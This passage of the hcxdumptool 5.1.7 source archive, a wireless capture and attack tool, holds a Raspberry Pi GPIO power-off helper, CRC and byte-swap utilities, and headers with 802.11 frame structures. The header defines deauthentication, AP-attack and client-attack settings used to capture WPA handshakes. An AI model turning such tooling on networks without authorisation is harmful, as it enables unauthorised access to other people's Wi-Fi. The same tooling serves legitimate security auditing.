/*===========================================================================*/ /* global var */ static int gpiostatusled; static int gpiobutton; /*===========================================================================*/ static inline size_t chop(char *buffer, size_t len) { static char *ptr; ptr = buffer +len -1; while(len) { if (*ptr != '\n') break; *ptr-- = 0; len--; } while(len) { if (*ptr != '\r') break; *ptr-- = 0; len--; } return len; } /*---------------------------------------------------------------------------*/ static inline int fgetline(FILE *inputstream, size_t size, char *buffer) { static size_t len; static char *buffptr; if(feof(inputstream)) return -1; buffptr = fgets (buffer, size, inputstream); if(buffptr == NULL) return -1; len = strlen(buffptr); len = chop(buffptr, len); return len; } /*===========================================================================*/ static bool initgpio(int gpioperi) { static int fd_mem; fd_mem = open("/dev/mem", O_RDWR|O_SYNC); if(fd_mem < 0) { fprintf(stderr, "failed to get device memory\n"); return false; } gpio_map = mmap(NULL, BLOCK_SIZE, PROT_READ|PROT_WRITE, MAP_SHARED, fd_mem, GPIO_BASE +gpioperi); close(fd_mem); if(gpio_map == MAP_FAILED) { fprintf(stderr, "failed to map GPIO memory\n"); return false; } gpio = (volatile unsigned *)gpio_map; return true; } /*===========================================================================*/ static int getrpirev() { static FILE *fh_rpi; static int len; static int rpi = 0; static int rev = 0; static int gpioperibase = 0; static char *revptr = NULL; static char *revstr = "Revision"; static char *hwstr = "Hardware"; static char *snstr = "Serial"; static char linein[128]; fh_rpi = fopen("/proc/cpuinfo", "r"); if(fh_rpi == NULL) { perror("failed to retrieve cpuinfo"); return gpioperibase; } while(1) { if((len = fgetline(fh_rpi, 128, linein)) == -1) { break; } if(len < 15) { continue; } if(memcmp(&linein, hwstr, 8) == 0) { rpi |= 1; continue; } if(memcmp(&linein, revstr, 8) == 0) { rpirevision = strtol(&linein[len -6], &revptr, 16); if((revptr - linein) == len) { rev = (rpirevision >> 4) &0xff; if(rev <= 3) { gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; continue; } if(rev == 0x9) { gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; continue; } if(rev == 0xc) { gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; continue; } if((rev == 0x04) || (rev == 0x08) || (rev == 0x0d) || (rev == 0x00e)) { gpioperibase = GPIO_PERI_BASE_NEW; rpi |= 2; continue; } continue; } rpirevision = strtol(&linein[len -4], &revptr, 16); if((revptr - linein) == len) { if((rpirevision < 0x02) || (rpirevision > 0x15)) { continue; } if((rpirevision == 0x11) || (rpirevision == 0x14)) { continue; } gpioperibase = GPIO_PERI_BASE_OLD; rpi |= 2; } continue; } if(memcmp(&linein, snstr, 6) == 0) { rpi |= 4; continue; } } fclose(fh_rpi); if(rpi < 0x7) { return 0; } return gpioperibase; } /*===========================================================================*/ static bool globalinit() { static int gpiobasemem = 0; if((gpiobutton > 0) || (gpiostatusled > 0)) { if(gpiobutton == gpiostatusled) { fprintf(stderr, "same value for wpi_button and wpi_statusled is not allowed\n"); return false; } gpiobasemem = getrpirev(); if(gpiobasemem == 0) { fprintf(stderr, "failed to locate GPIO\n"); return false; } if(initgpio(gpiobasemem) == false) { fprintf(stderr, "failed to init GPIO\n"); return false; } if(gpiostatusled > 0) { INP_GPIO(gpiostatusled); OUT_GPIO(gpiostatusled); } if(gpiobutton > 0) { INP_GPIO(gpiobutton); } } return true; } /*===========================================================================*/ static void ledflash() { if(gpiostatusled == 0) { return; } GPIO_SET = 1 << gpiostatusled; usleep(GPIO_DELAY); GPIO_CLR = 1 << gpiostatusled; usleep(GPIO_DELAY); GPIO_SET = 1 << gpiostatusled; usleep(GPIO_DELAY); GPIO_CLR = 1 << gpiostatusled; usleep(GPIO_DELAY); return; } /*===========================================================================*/ __attribute__ ((noreturn)) static void waitloop() { static int ret = 0; static int count = 0; while(1) { if(GET_GPIO(gpiobutton) > 0) { if(GET_GPIO(gpiobutton) > 0) { if(gpiostatusled > 0) { GPIO_CLR = 1 << gpiostatusled; usleep(GPIO_DELAY); GPIO_SET = 1 << gpiostatusled; usleep(GPIO_DELAY); GPIO_CLR = 1 << gpiostatusled; usleep(GPIO_DELAY); GPIO_SET = 1 << gpiostatusled; usleep(GPIO_DELAY); } ret = system("poweroff"); if(ret != 0) { puts("poweroff failed!"); exit(EXIT_FAILURE); } } } sleep(1); count++; if(count < 5) { continue; } ledflash(); count = 0; } } /*===========================================================================*/ __attribute__ ((noreturn)) static inline void version(char *eigenname) { printf("%s %s (wpi version) (C) %s ZeroBeat\n", eigenname, VERSION, VERSION_JAHR); exit(EXIT_SUCCESS); } /*---------------------------------------------------------------------------*/ __attribute__ ((noreturn)) static inline void usage(char *eigenname) { printf("%s %s (wpi version) (C) %s ZeroBeat\n" "usage : %s \n" " press the button to power off\n" " hardware modification is necessary, read more:\n" " https://github.com/ZerBea/hcxdumptool/tree/master/docs\n" "\n" "options:\n" "-h : show this help\n" "-v : show version\n" "\n" "--gpio_button= : Raspberry Pi GPIO pin number of button (2...27)\n" " default = GPIO not in use\n" "--gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27)\n" " default = GPIO not in use\n" "--help : show this help\n" "--version : show version\n" "\n" "run gpio readall to print a table of all accessable pins and their numbers\n" "(wiringPi, BCM_GPIO and physical pin numbers)\n" "\n", eigenname, VERSION, VERSION_JAHR, eigenname); exit(EXIT_SUCCESS); } /*---------------------------------------------------------------------------*/ __attribute__ ((noreturn)) static inline void usageerror(char *eigenname) { printf("%s %s (wpi version) (C) %s by ZeroBeat\n" "usage: %s -h for help\n", eigenname, VERSION, VERSION_JAHR, eigenname); exit(EXIT_FAILURE); } /*===========================================================================*/ int main(int argc, char *argv[]) { static int auswahl; static int index; static const char *short_options = "hv"; static const struct option long_options[] = { {"gpio_button", required_argument, NULL, HCX_GPIO_BUTTON}, {"gpio_statusled", required_argument, NULL, HCX_GPIO_STATUSLED}, {"version", no_argument, NULL, HCX_VERSION}, {"help", no_argument, NULL, HCX_HELP}, {NULL, 0, NULL, 0} }; auswahl = -1; index = 0; optind = 1; optopt = 0; gpiostatusled = 0; gpiobutton = 0; while((auswahl = getopt_long(argc, argv, short_options, long_options, &index)) != -1) { switch (auswahl) { case HCX_GPIO_BUTTON: gpiobutton = strtoll(optarg, NULL, 10); if((gpiobutton < 2) || (gpiobutton > 27)) { fprintf(stderr, "only 2...27 allowed\n"); exit(EXIT_FAILURE); } break; case HCX_GPIO_STATUSLED: gpiostatusled = strtoll(optarg, NULL, 10); if((gpiostatusled < 2) || (gpiostatusled > 27)) { fprintf(stderr, "only 2...27 allowed\n"); exit(EXIT_FAILURE); } break; case HCX_HELP: usage(basename(argv[0])); break; case HCX_VERSION: version(basename(argv[0])); break; case '?': usageerror(basename(argv[0])); break; } } if((gpiobutton == 0) && (gpiostatusled == 0)) { fprintf(stderr, "no GPIO pin selected\n"); exit(EXIT_FAILURE); } if(globalinit() == false) { exit(EXIT_FAILURE); } waitloop(); return EXIT_SUCCESS; } /*===========================================================================*/ hcxdumptool-5.1.7/include/000077500000000000000000000000001350370021700155135ustar00rootroot00000000000000hcxdumptool-5.1.7/include/android-ifaddrs/000077500000000000000000000000001350370021700205455ustar00rootroot00000000000000hcxdumptool-5.1.7/include/android-ifaddrs/.lock000066400000000000000000000000001350370021700214640ustar00rootroot00000000000000hcxdumptool-5.1.7/include/byteops.c000066400000000000000000000037111350370021700173460ustar00rootroot00000000000000#define _GNU_SOURCE #include #include #include /*===========================================================================*/ uint32_t rotl32(uint32_t a, uint32_t n) { return((a << n) | (a >> (32 - n))); } /*===========================================================================*/ uint64_t rotl64(uint64_t a, uint64_t n) { return ((a << n) | (a >> (64 - n))); } /*===========================================================================*/ uint32_t rotr32(uint32_t a, uint32_t n) { return ((a >> n) | (a << (32 - n))); } /*===========================================================================*/ uint64_t rotr64(uint64_t a, uint64_t n) { return ((a >> n) | (a << (64 - n))); } /*===========================================================================*/ uint16_t byte_swap_8(uint8_t n) { return (n & 0xf0) >> 4 | (n & 0x0f) << 4; } /*===========================================================================*/ uint16_t byte_swap_16(uint16_t n) { return (n & 0xff00) >> 8 | (n & 0x00ff) << 8; } /*===========================================================================*/ uint32_t byte_swap_32(uint32_t n) { #if defined (__clang__) || defined (__GNUC__) return __builtin_bswap32 (n); #else return(n & 0xff000000) >> 24 | (n & 0x00ff0000) >> 8 | (n & 0x0000ff00) << 8 | (n & 0x000000ff) << 24; #endif } /*===========================================================================*/ uint64_t byte_swap_64(uint64_t n) { #if defined (__clang__) || defined (__GNUC__) return __builtin_bswap64 (n); #else return (n & 0xff00000000000000ULL) >> 56 | (n & 0x00ff000000000000ULL) >> 40 | (n & 0x0000ff0000000000ULL) >> 24 | (n & 0x000000ff00000000ULL) >> 8 | (n & 0x00000000ff000000ULL) << 8 | (n & 0x0000000000ff0000ULL) << 24 | (n & 0x000000000000ff00ULL) << 40 | (n & 0x00000000000000ffULL) << 56; #endif } /*===========================================================================*/ hcxdumptool-5.1.7/include/hashops.c000066400000000000000000000006161350370021700173270ustar00rootroot00000000000000#include "hashops.h" /*===========================================================================*/ uint32_t fcscrc32check(const uint8_t *buffer, uint32_t bufferlen) { uint32_t crc = 0xFFFFFFFF; uint32_t p; for(p = 0; p < bufferlen; ++p) { crc = crc32table[(crc ^buffer[p]) & 0xff] ^(crc >> 8); } return ~crc; } /*===========================================================================*/ hcxdumptool-5.1.7/include/hashops.h000066400000000000000000000063511350370021700173360ustar00rootroot00000000000000/*===========================================================================*/ /* CRC polynomial 0xedb88320 */ static const uint32_t crc32table[] = { 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d }; /*===========================================================================*/ hcxdumptool-5.1.7/include/hcxdumptool.h000066400000000000000000000077651350370021700202510ustar00rootroot00000000000000#define ERRORMAX 100 #define GPSDDATA_MAX 1536 #define ESSID_LEN_MAX 32 #define RSN_LEN_MAX 24 #define TIME_INTERVAL 5 #define EAPOLTIMEOUT 150000 #define M1WAITTIME 1000 #define DEAUTHENTICATIONINTERVALL 10 #define DEAUTHENTICATIONS_MAX 100 #define APATTACKSINTERVALL 10 #define APPATTACKS_MAX 100 #define FILTERLIST_MAX 64 #define FILTERLIST_LINE_LEN 0xff #define APLIST_MAX 0xfff #define MYAPLIST_MAX 0xfff #define POWNEDLIST_MAX 0xfff #define PROBEREQUESTLIST_MAX 512 #define MYPROBERESPONSELIST_MAX 512 #define CS_BROADCOM 1 #define CS_APPLE_BROADCOM 2 #define CS_SONOS 3 #define CS_NETGEARBROADCOM 4 #define CS_WILIBOX 5 #define CS_CISCO 6 #define CS_ENDE 7 #define RX_M1 0b00000001 #define RX_M12 0b00000010 #define RX_PMKID 0b00000100 #define RX_M23 0b00001000 #define STATUS_EAPOL 0b00000001 #define STATUS_PROBES 0b00000010 #define STATUS_AUTH 0b00000100 #define STATUS_ASSOC 0b00001000 #define STATUS_BEACON 0b00010000 #define HCXD_FILTERLIST 1 #define HCXD_FILTERMODE 2 #define HCXD_SILENT 3 #define HCXD_DISABLE_ACTIVE_SCAN 4 #define HCXD_DISABLE_DEAUTHENTICATIONS 5 #define HCXD_GIVE_UP_DEAUTHENTICATIONS 6 #define HCXD_DISABLE_DISASSOCIATIONS 7 #define HCXD_DISABLE_AP_ATTACKS 8 #define HCXD_GIVE_UP_AP_ATTACKS 9 #define HCXD_DISABLE_CLIENT_ATTACKS 10 #define HCXD_USE_GPSD 11 #define HCXD_AP_MAC 12 #define HCXD_STATION_MAC 13 #define HCXD_STATION_VENDOR 14 #define HCXD_DO_RCASCAN 15 #define HCXD_SAVE_RCASCAN 16 #define HCXD_SAVE_RCASCAN_RAW 17 #define HCXD_ENABLE_STATUS 18 #define HCXD_IGNORE_WARNING 19 #define HCXD_POWER_OFF 20 #define HCXD_GPIO_BUTTON 21 #define HCXD_GPIO_STATUSLED 22 #define HCXD_HELP 'h' #define HCXD_VERSION 'v' #ifdef __BYTE_ORDER__ #if __BYTE_ORDER__ == __ORDER_BIG_ENDIAN__ #define BIG_ENDIAN_HOST #endif #else #ifdef __OpenBSD__ # include # if BYTE_ORDER == BIG_ENDIAN # define BIG_ENDIAN_HOST # endif #endif #endif /*===========================================================================*/ struct aplist_s { uint64_t timestamp; uint8_t status; int count; uint8_t addr[6]; uint8_t channel; int essid_len; uint8_t essid[ESSID_LEN_MAX]; int rsn_len; uint8_t rsn[RSN_LEN_MAX]; }; typedef struct aplist_s aplist_t; #define APLIST_SIZE (sizeof(aplist_t)) static int sort_aplist_by_time(const void *a, const void *b) { const aplist_t *ia = (const aplist_t *)a; const aplist_t *ib = (const aplist_t *)b; return (ia->timestamp < ib->timestamp); } static int sort_aplist_by_essid(const void *a, const void *b) { const aplist_t *ia = (const aplist_t *)a; const aplist_t *ib = (const aplist_t *)b; if(memcmp(ia->essid, ib->essid, 32) > 0) return 1; else if(memcmp(ia->essid, ib->essid, 32) < 0) return -1; return 0; } /*===========================================================================*/ struct myaplist_s { uint64_t timestamp; uint8_t status; uint8_t addr[6]; int essid_len; uint8_t essid[ESSID_LEN_MAX]; }; typedef struct myaplist_s myaplist_t; #define MYAPLIST_SIZE (sizeof(myaplist_t)) static int sort_myaplist_by_time(const void *a, const void *b) { const myaplist_t *ia = (const myaplist_t *)a; const myaplist_t *ib = (const myaplist_t *)b; return (ia->timestamp < ib->timestamp); } /*===========================================================================*/ struct maclist_s { uint64_t timestamp; uint8_t status; uint8_t addr[6]; }; typedef struct maclist_s maclist_t; #define MACLIST_SIZE (sizeof(maclist_t)) /*===========================================================================*/ struct macmaclist_s { uint64_t timestamp; uint8_t status; uint8_t addr1[6]; uint8_t addr2[6]; }; typedef struct macmaclist_s macmaclist_t; #define MACMACLIST_SIZE (sizeof(macmaclist_t)) static int sort_macmaclist_by_time(const void *a, const void *b) { const macmaclist_t *ia = (const macmaclist_t *)a; const macmaclist_t *ib = (const macmaclist_t *)b; if(ia->timestamp < ib->timestamp) return 1; else if(ia->timestamp > ib->timestamp) return -1; return 0; } /*===========================================================================*/ hcxdumptool-5.1.7/include/ieee80211.c000066400000000000000000000007701350370021700171660ustar00rootroot00000000000000#include "ieee80211.h" /*===========================================================================*/ int getkeyinfo(uint16_t ki) { if(ki & WPA_KEY_INFO_ACK) { if(ki & WPA_KEY_INFO_INSTALL) { /* handshake 3 */ return 3; } else { /* handshake 1 */ return 1; } } else { if(ki & WPA_KEY_INFO_SECURE) { /* handshake 4 */ return 4; } else { /* handshake 2 */ return 2; } } return 0; } /*===========================================================================*/ hcxdumptool-5.1.7/include/ieee80211.h000066400000000000000000000565631350370021700172060ustar00rootroot00000000000000#define MYREPLAYCOUNT 63232 #define MAC_SIZE_ACK (10) #define MAC_SIZE_RTS (16) #define MAC_SIZE_NORM (24) #define MAC_SIZE_QOS (26) #define MAC_SIZE_LONG (30) #define MAC_SIZE_QOS_LONG (32) #define FCS_LEN 4 /* types */ #define IEEE80211_FTYPE_MGMT 0x0 #define IEEE80211_FTYPE_CTL 0x1 #define IEEE80211_FTYPE_DATA 0x2 #define IEEE80211_FTYPE_RCVD 0x3 /* management */ #define IEEE80211_STYPE_ASSOC_REQ 0x0 #define IEEE80211_STYPE_ASSOC_RESP 0x1 #define IEEE80211_STYPE_REASSOC_REQ 0x2 #define IEEE80211_STYPE_REASSOC_RESP 0x3 #define IEEE80211_STYPE_PROBE_REQ 0x4 #define IEEE80211_STYPE_PROBE_RESP 0x5 #define IEEE80211_STYPE_BEACON 0x8 #define IEEE80211_STYPE_ATIM 0x9 #define IEEE80211_STYPE_DISASSOC 0xa #define IEEE80211_STYPE_AUTH 0xb #define IEEE80211_STYPE_DEAUTH 0xc #define IEEE80211_STYPE_ACTION 0xd /* control */ #define IEEE80211_STYPE_CTL_EXT 0x6 #define IEEE80211_STYPE_BACK_REQ 0x8 #define IEEE80211_STYPE_BACK 0x9 #define IEEE80211_STYPE_PSPOLL 0xa #define IEEE80211_STYPE_RTS 0xb #define IEEE80211_STYPE_CTS 0xc #define IEEE80211_STYPE_ACK 0xd #define IEEE80211_STYPE_CFEND 0xe #define IEEE80211_STYPE_CFENDACK 0xf /* data */ #define IEEE80211_STYPE_DATA 0x0 #define IEEE80211_STYPE_DATA_CFACK 0x1 #define IEEE80211_STYPE_DATA_CFPOLL 0x2 #define IEEE80211_STYPE_DATA_CFACKPOLL 0x3 #define IEEE80211_STYPE_NULLFUNC 0x4 #define IEEE80211_STYPE_CFACK 0x5 #define IEEE80211_STYPE_CFPOLL 0x6 #define IEEE80211_STYPE_CFACKPOLL 0x7 #define IEEE80211_STYPE_QOS_DATA 0x8 #define IEEE80211_STYPE_QOS_DATA_CFACK 0x9 #define IEEE80211_STYPE_QOS_DATA_CFPOLL 0xa #define IEEE80211_STYPE_QOS_DATA_CFACKPOLL 0xb #define IEEE80211_STYPE_QOS_NULLFUNC 0xc #define IEEE80211_STYPE_QOS_CFACK 0xd #define IEEE80211_STYPE_QOS_CFPOLL 0xe #define IEEE80211_STYPE_QOS_CFACKPOLL 0xf /* Reason codes (IEEE 802.11-2007, 7.3.1.7, Table 7-22) */ #define WLAN_REASON_UNSPECIFIED 1 #define WLAN_REASON_PREV_AUTH_NOT_VALID 2 #define WLAN_REASON_DEAUTH_LEAVING 3 #define WLAN_REASON_DISASSOC_DUE_TO_INACTIVITY 4 #define WLAN_REASON_DISASSOC_AP_BUSY 5 #define WLAN_REASON_CLASS2_FRAME_FROM_NONAUTH_STA 6 #define WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA 7 #define WLAN_REASON_DISASSOC_STA_HAS_LEFT 8 #define WLAN_REASON_STA_REQ_ASSOC_WITHOUT_AUTH 9 /* IEEE 802.11h */ #define WLAN_REASON_PWR_CAPABILITY_NOT_VALID 10 #define WLAN_REASON_SUPPORTED_CHANNEL_NOT_VALID 11 /* IEEE 802.11i */ #define WLAN_REASON_INVALID_IE 13 #define WLAN_REASON_MICHAEL_MIC_FAILURE 14 #define WLAN_REASON_4WAY_HANDSHAKE_TIMEOUT 15 #define WLAN_REASON_GROUP_KEY_UPDATE_TIMEOUT 16 #define WLAN_REASON_IE_IN_4WAY_DIFFERS 17 #define WLAN_REASON_GROUP_CIPHER_NOT_VALID 18 #define WLAN_REASON_PAIRWISE_CIPHER_NOT_VALID 19 #define WLAN_REASON_AKMP_NOT_VALID 20 #define WLAN_REASON_UNSUPPORTED_RSN_IE_VERSION 21 #define WLAN_REASON_INVALID_RSN_IE_CAPAB 22 #define WLAN_REASON_IEEE_802_1X_AUTH_FAILED 23 #define WLAN_REASON_CIPHER_SUITE_REJECTED 24 #define IEEE80211_SEQ_SEQ_MASK 0xfff0 #define IEEE80211_SEQ_SEQ_SHIFT 4 #define WBIT(n) (1 << (n)) #define WPA_KEY_INFO_TYPE_MASK (WBIT(0) | WBIT(1) | WBIT(2)) #define WPA_KEY_INFO_TYPE_HMAC_MD5_RC4 WBIT(0) #define WPA_KEY_INFO_TYPE_HMAC_SHA1_AES WBIT(1) #define WPA_KEY_INFO_KEY_TYPE WBIT(3) /* 1 = Pairwise, 0 = Group key */ #define WPA_KEY_INFO_KEY_INDEX_MASK (WBIT(4) | WBIT(5)) #define WPA_KEY_INFO_KEY_INDEX_SHIFT 4 #define WPA_KEY_INFO_INSTALL WBIT(6) /* pairwise */ #define WPA_KEY_INFO_TXRX WBIT(6) /* group */ #define WPA_KEY_INFO_ACK WBIT(7) #define WPA_KEY_INFO_MIC WBIT(8) #define WPA_KEY_INFO_SECURE WBIT(9) #define WPA_KEY_INFO_ERROR WBIT(10) #define WPA_KEY_INFO_REQUEST WBIT(11) #define WPA_KEY_INFO_ENCR_KEY_DATA WBIT(12) /* IEEE 802.11i/RSN only */ /*===========================================================================*/ struct radiotap_header { uint8_t it_version; uint8_t it_pad; uint16_t it_len; uint32_t it_present; } __attribute__((__packed__)); typedef struct radiotap_header rth_t; #define RTH_SIZE (sizeof(rth_t)) /*===========================================================================*/ struct ethernet2_header { uint8_t addr1[6]; uint8_t addr2[6]; uint16_t ether_type; } __attribute__((packed)); typedef struct ethernet2_header eth2_t; #define ETH2_SIZE (sizeof(eth2_t)) /*===========================================================================*/ struct loopback_header { uint32_t family; } __attribute__((packed)); typedef struct loopback_header loba_t; #define LOBA_SIZE (sizeof(loba_t)) /*===========================================================================*/ #define WLAN_DEVNAMELEN_MAX 16 struct prism_item { uint32_t did; uint16_t status; uint16_t len; uint32_t data; } __attribute__((packed)); struct prism_header { uint32_t msgcode; uint32_t msglen; char devname[WLAN_DEVNAMELEN_MAX]; struct prism_item hosttime; struct prism_item mactime; struct prism_item channel; struct prism_item rssi; struct prism_item sq; struct prism_item signal; struct prism_item noise; struct prism_item rate; struct prism_item istx; struct prism_item frmlen; } __attribute__((packed)); typedef struct prism_item prism_item_t; typedef struct prism_header prism_t; #define PRISM_SIZE (sizeof(prism_t)) /*===========================================================================*/ struct avs_header { uint32_t version; uint32_t len; uint64_t mactime; uint64_t hosttime; uint32_t phytype; uint32_t channel; uint32_t datarate; uint32_t antenna; uint32_t priority; uint32_t ssi_type; int32_t ssi_signal; int32_t ssi_noise; uint32_t preamble; uint32_t encoding; } __attribute__((packed)); typedef struct avs_header avs_t; #define AVS_SIZE (sizeof(avs_t)) /*===========================================================================*/ struct ppi_header { uint8_t pph_version; uint8_t pph_flags; uint16_t pph_len; uint32_t pph_dlt; } __attribute__((packed)); typedef struct ppi_header ppi_t; #define PPI_SIZE (sizeof(ppi_t)) /*===========================================================================*/ struct msnetmon_header { uint8_t version_minor; uint8_t version_major; uint16_t network; uint16_t ts_year; uint16_t ts_month; uint16_t ts_weekday; uint16_t ts_day; uint16_t ts_hour; uint16_t ts_min; uint16_t ts_sec; uint16_t ts_msec; uint32_t frametableoffset; uint32_t frametablelength; uint32_t userdataoffset; uint32_t userdatalength; uint32_t commentdataoffset; uint32_t commentdatalength; uint32_t statisticsoffset; uint32_t statisticslength; uint32_t networkinfooffset; uint32_t networkinfolength; } __attribute__((packed)); typedef struct msnetmon_header msntm_t; #define MSNETMON_SIZE (sizeof(msntm_t)) /*===========================================================================*/ struct fcs_frame { uint32_t fcs; }; typedef struct fcs_frame fcs_t; #define FCS_SIZE (sizeof(fcs_t)) /*===========================================================================*/ struct qos_frame { uint8_t control; uint8_t flags; } __attribute__((__packed__)); typedef struct qos_frame qos_t; #define QOS_SIZE (sizeof(qos_t)) /*===========================================================================*/ /* * DS bit usage * * TA = transmitter address * RA = receiver address * DA = destination address * SA = source address * * ToDS FromDS A1(RA) A2(TA) A3 A4 Use * ----------------------------------------------------------------- * 0 0 DA SA BSSID - IBSS/DLS * 0 1 DA BSSID SA - AP -> STA * 1 0 BSSID SA DA - AP <- STA * 1 1 RA TA DA SA unspecified (WDS) */ struct mac_frame { #ifdef BIG_ENDIAN_HOST unsigned subtype : 4; unsigned type : 2; unsigned version : 2; unsigned ordered : 1; unsigned protected : 1; unsigned more_data : 1; unsigned power : 1; unsigned retry : 1; unsigned more_frag : 1; unsigned from_ds : 1; unsigned to_ds : 1; #else unsigned version : 2; unsigned type : 2; unsigned subtype : 4; unsigned to_ds : 1; unsigned from_ds : 1; unsigned more_frag : 1; unsigned retry : 1; unsigned power : 1; unsigned more_data : 1; unsigned protected : 1; unsigned ordered : 1; #endif uint16_t duration; uint8_t addr1[6]; uint8_t addr2[6]; uint8_t addr3[6]; uint16_t sequence; uint8_t addr4[6]; qos_t qos; } __attribute__((__packed__)); typedef struct mac_frame mac_t; /*===========================================================================*/ struct capabilities_ap_frame { uint64_t timestamp; uint16_t beaconintervall; uint16_t capabilities; } __attribute__((__packed__)); typedef struct capabilities_ap_frame capap_t; #define CAPABILITIESAP_SIZE sizeof(capap_t) /*===========================================================================*/ struct capabilities_sta_frame { uint16_t capabilities; uint16_t listeninterval; } __attribute__((__packed__)); typedef struct capabilities_sta_frame capsta_t; #define CAPABILITIESSTA_SIZE sizeof(capsta_t) /*===========================================================================*/ struct capabilitiesreq_sta_frame { uint16_t capabilities; uint16_t listeninterval; uint8_t addr[6]; } __attribute__((__packed__)); typedef struct capabilitiesreq_sta_frame capreqsta_t; #define CAPABILITIESREQSTA_SIZE sizeof(capreqsta_t) /*===========================================================================*/ struct ie_tag { uint8_t id; #define TAG_SSID 0x00 #define TAG_RATE 0x01 #define TAG_CHAN 0x03 #define TAG_RSN 0x30 uint8_t len; uint8_t data[1]; } __attribute__((__packed__)); typedef struct ie_tag ietag_t; #define IETAG_SIZE offsetof(ietag_t, data) /*===========================================================================*/ struct rsn_tag { uint8_t id; uint8_t len; uint16_t version; } __attribute__((__packed__)); typedef struct rsn_tag rsntag_t; #define RSNTAG_SIZE sizeof(rsntag_t) /*===========================================================================*/ struct vendor_tag { uint8_t tagnr; uint8_t taglen; uint8_t oui[3]; uint8_t data[1]; } __attribute__ ((packed)); typedef struct vendor_tag vendor_t; #define VENDORTAG_SIZE offsetof(vendor_t, data) #define VENDORTAG_AUTH_SIZE 0x0b /*===========================================================================*/ struct llc_frame { uint8_t dsap; uint8_t ssap; uint8_t control; uint8_t org[3]; uint16_t type; #define LLC_TYPE_AUTH 0x888e #define 